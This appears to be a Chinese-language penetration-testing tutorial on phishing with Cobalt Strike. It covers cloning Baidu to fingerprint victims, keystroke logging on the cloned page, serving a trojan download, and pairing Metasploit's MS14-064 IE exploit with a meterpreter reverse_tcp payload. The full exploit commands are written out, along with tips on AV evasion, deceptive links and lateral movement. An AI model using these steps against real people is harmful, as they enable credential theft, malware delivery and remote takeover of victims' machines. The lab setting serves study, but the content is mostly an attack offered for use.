一、环境
自行搭建,kill,Windows10,cs
二、原理
如图所示
三、钓鱼演示
首先第一步:打开System Profiler-分析器功能
选择克隆www.baidu.com
页面做钓鱼
之后我们通过包装域名,各种手段让攻击对象访问:http:kill的ip/baidu
之后会自动跳转到百度
可看到选择应用信息后,钓到了用户用的系统以及浏览器版本型号…这里别小看两个信息,思路是该模块可以修改,利用溢出代码等形式提权或者获得更多的信息收集…下面我会写一些演示!!
3.1 克隆模块和克隆网站进行键盘记录攻击
打开克隆网站模块
克隆键盘记录
这里克隆网站可以是http和https的URL…克隆到192.168.2.153:801链接上!! 勾选Log Keystrokes on cloned site后,记录键盘操作!
点击web log等待
等对方在克隆网站上进行操作后
我们这边直接监听
可看到记录了对方输入键盘的信息
3.2克隆网站下载执行木马
打开Host File 克隆一个页面并提供一个后门文件
file:选择CS生成的shell,或者MSF也行! 确定URL下载的地址端口链接等情况!
木马做好放里面
生成http://192.168.131.129:801/download/file.exe恶意链接
制作钓鱼网页
访问钓鱼网页
可看到ie访问该页面下载了file.exe生成的CS后门文件… 这里ie带有web安全下载防御功能这种思路是两个模块配合完成的,其中可以修改图标、文件名、弄个免杀、换个欺骗链接,很好钓鱼!
点击软件木马上线
3.3 Metasploit溢出代码与Cobalt Strik配合钓鱼(重点)
本次演示的是思路,拿的是一个针对XP或者以下系统,利用MS14_064利用IE执行远控木马…记住是思路!!
use exploit/windows/browser/ms14_064_ole_code_execution set srvhost 192.168.2.153 set SRVPORT 6666 set payload windows/meterpreter/reverse_tcp set lhost 192.168.2.153 exploit
这里很简答,MSF执行即可~
`http://192.168.2.153:6666/Sixcra`获得恶意链接
很简单,利用和方法3一样,打开克隆网站模块,放入Attack即可!! 这里就不勾选键盘记录了,因为直接能控制对方了!
生成URL:http://192.168.2.153:80/baidu
可看到当对方访问做好的http://192.168.2.153:80/baidu钓鱼页面后,直接跳转到了百度…
但是通过溢出漏洞在攻击端获得了对方的控制shell…
通过控制,继续横向渗透即可!!